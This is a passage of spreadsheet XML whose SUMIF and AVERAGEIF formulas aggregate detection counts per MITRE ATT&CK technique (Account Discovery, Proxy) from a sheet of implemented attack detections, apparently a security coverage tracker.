        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>10</v>
      </c>
      <c r="M20" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N20" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O20" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P20" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S20" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>204</v>
      </c>
      <c r="T20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>10</v>
      </c>
      <c r="U20" s="4" t="str">
        <f t="shared" si="2"/>
        <v>10 (204)</v>
      </c>
      <c r="V20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>10</v>
      </c>
      <c r="Y20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>205</v>
      </c>
      <c r="Z20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>11</v>
      </c>
      <c r="AA20" s="322" t="str">
        <f t="shared" si="3"/>
        <v>11 (205)</v>
      </c>
      <c r="AB20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC20" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>11</v>
      </c>
      <c r="AE20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>106</v>
      </c>
      <c r="AF20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>105</v>
      </c>
      <c r="AG20" s="322" t="str">
        <f t="shared" si="4"/>
        <v>105 (106)</v>
      </c>
      <c r="AH20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI20" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>100</v>
      </c>
      <c r="AK20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>311</v>
      </c>
      <c r="AL20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>116</v>
      </c>
      <c r="AM20" s="322" t="str">
        <f t="shared" si="5"/>
        <v>116 (311)</v>
      </c>
      <c r="AN20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>7</v>
      </c>
      <c r="AO20" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>107</v>
      </c>
      <c r="AQ20" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR20" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS20" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT20" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY20" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ20" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA20" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC20" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>204</v>
      </c>
      <c r="BD20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>10</v>
      </c>
      <c r="BE20" s="4" t="str">
        <f t="shared" si="8"/>
        <v>10 (204)</v>
      </c>
      <c r="BF20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>10</v>
      </c>
      <c r="BI20" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>20</v>
      </c>
      <c r="BJ20" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>10</v>
      </c>
      <c r="BK20" s="322" t="str">
        <f t="shared" si="9"/>
        <v>10 (20)</v>
      </c>
      <c r="BL20" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>10</v>
      </c>
      <c r="BO20" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>218</v>
      </c>
      <c r="BP20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>208</v>
      </c>
      <c r="BQ20" s="4" t="str">
        <f t="shared" si="10"/>
        <v>208 (218)</v>
      </c>
      <c r="BR20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS20" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU20" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>198</v>
      </c>
      <c r="BV20" s="292">
        <v>5</v>
      </c>
      <c r="BW20" s="322">
        <v>5</v>
      </c>
      <c r="BX20" s="4" t="str">
        <f t="shared" si="11"/>
        <v>5 (5)</v>
      </c>
      <c r="BY20" s="12">
        <v>1</v>
      </c>
      <c r="BZ20" s="13">
        <v>1</v>
      </c>
      <c r="CA20" s="394">
        <v>5</v>
      </c>
      <c r="CB20" s="288">
        <v>10</v>
      </c>
      <c r="CC20" s="4">
        <v>10</v>
      </c>
      <c r="CD20" s="4" t="str">
        <f t="shared" si="12"/>
        <v>10 (10)</v>
      </c>
      <c r="CE20" s="4">
        <v>1</v>
      </c>
      <c r="CF20" s="4">
        <v>1</v>
      </c>
      <c r="CG20" s="13">
        <v>1</v>
      </c>
      <c r="CH20" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:86" ht="15" customHeight="1">
      <c r="A21" s="4">
        <f t="shared" si="13"/>
        <v>19</v>
      </c>
      <c r="B21" s="4" t="str">
        <f>IFERROR(VLOOKUP(A21,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1087</v>
      </c>
      <c r="C21" s="493" t="str">
        <f>IFERROR(VLOOKUP(B21,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Account Discovery</v>
      </c>
      <c r="D21" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B21)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E21" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F21" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G21" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>24</v>
      </c>
      <c r="H21" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I21" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (24)</v>
      </c>
      <c r="J21" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M21" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>11</v>
      </c>
      <c r="N21" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O21" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (11)</v>
      </c>
      <c r="P21" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>4</v>
      </c>
      <c r="Q21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S21" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>35</v>
      </c>
      <c r="T21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U21" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (35)</v>
      </c>
      <c r="V21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>42</v>
      </c>
      <c r="Z21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>10</v>
      </c>
      <c r="AA21" s="322" t="str">
        <f t="shared" si="3"/>
        <v>10 (42)</v>
      </c>
      <c r="AB21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC21" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>36</v>
      </c>
      <c r="AF21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>13</v>
      </c>
      <c r="AG21" s="322" t="str">
        <f t="shared" si="4"/>
        <v>13 (36)</v>
      </c>
      <c r="AH21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>13</v>
      </c>
      <c r="AI21" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>78</v>
      </c>
      <c r="AL21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>23</v>
      </c>
      <c r="AM21" s="322" t="str">
        <f t="shared" si="5"/>
        <v>23 (78)</v>
      </c>
      <c r="AN21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>22</v>
      </c>
      <c r="AO21" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ21" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR21" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS21" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT21" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>4</v>
      </c>
      <c r="AX21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY21" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (4)</v>
      </c>
      <c r="AZ21" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA21" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC21" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>39</v>
      </c>
      <c r="BD21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>9</v>
      </c>
      <c r="BE21" s="4" t="str">
        <f t="shared" si="8"/>
        <v>9 (39)</v>
      </c>
      <c r="BF21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>9</v>
      </c>
      <c r="BG21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI21" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>4</v>
      </c>
      <c r="BJ21" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>4</v>
      </c>
      <c r="BK21" s="322" t="str">
        <f t="shared" si="9"/>
        <v>4 (4)</v>
      </c>
      <c r="BL21" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO21" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>4</v>
      </c>
      <c r="BP21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>4</v>
      </c>
      <c r="BQ21" s="4" t="str">
        <f t="shared" si="10"/>
        <v>4 (4)</v>
      </c>
      <c r="BR21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS21" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>0</v>
      </c>
      <c r="BT21" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU21" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV21" s="292">
        <v>0</v>
      </c>
      <c r="BW21" s="322">
        <v>0</v>
      </c>
      <c r="BX21" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY21" s="12">
        <v>0</v>
      </c>
      <c r="BZ21" s="13">
        <v>0</v>
      </c>
      <c r="CA21" s="394">
        <v>0</v>
      </c>
      <c r="CB21" s="288">
        <v>0</v>
      </c>
      <c r="CC21" s="4">
        <v>0</v>
      </c>
      <c r="CD21" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE21" s="4">
        <v>0</v>
      </c>
      <c r="CF21" s="4">
        <v>0</v>
      </c>
      <c r="CG21" s="13">
        <v>0</v>
      </c>
      <c r="CH21" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:86" ht="15" customHeight="1">
      <c r="A22" s="4">
        <f t="shared" si="13"/>
        <v>20</v>
      </c>
      <c r="B22" s="4" t="str">
        <f>IFERROR(VLOOKUP(A22,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1090</v>
      </c>
      <c r="C22" s="493" t="str">
        <f>IFERROR(VLOOKUP(B22,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Proxy</v>
      </c>
      <c r="D22" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B22)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E22" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>23</v>
      </c>
      <c r="F22" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (23)</v>
      </c>
      <c r="G22" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>4</v>
      </c>
      <c r="H22" s="322">
